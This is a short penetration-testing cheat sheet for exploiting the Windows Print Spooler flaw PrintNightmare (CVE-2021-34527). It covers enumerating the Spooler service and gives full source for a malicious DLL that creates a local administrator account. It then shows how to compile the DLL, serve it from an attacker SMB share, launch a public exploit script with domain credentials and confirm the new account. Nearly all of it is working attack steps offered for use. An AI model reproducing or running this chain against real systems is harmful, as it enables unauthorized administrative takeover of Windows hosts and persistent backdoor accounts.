PrintNightMare - CVE-2021-34527

Is Spooler active ?

# with cme
nxc smb $target_ip -M spooler

# with impacket
rpcdump.py @$target_ip | egrep 'MS-RPRN|MS-PAR'

Prepare the exploit

Here is the DLL we will use, it creates an user and add it as local administrator ☺️

nightmare.c
#include <windows.h> 

int RunCMD()
{
    system("net users pnightmare Passw0rd123. /add");
    system("net localgroup administrators pnightmare /add");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Compile it :

x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

Exploit it :

# clone the repo
git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare

# prepare smb share with the nightmare.dll inside
smbserver.py -smb2support share .

# exploit
python3 CVE-2021-1675.py $domain/$user:$password@$hostnameanddomainname '\\192.168.56.1\share\nightmare.dll'

# verify
cme smb $target_ip -u pnightmare -p 'Passw0rd123.'

Last updated

Was this helpful?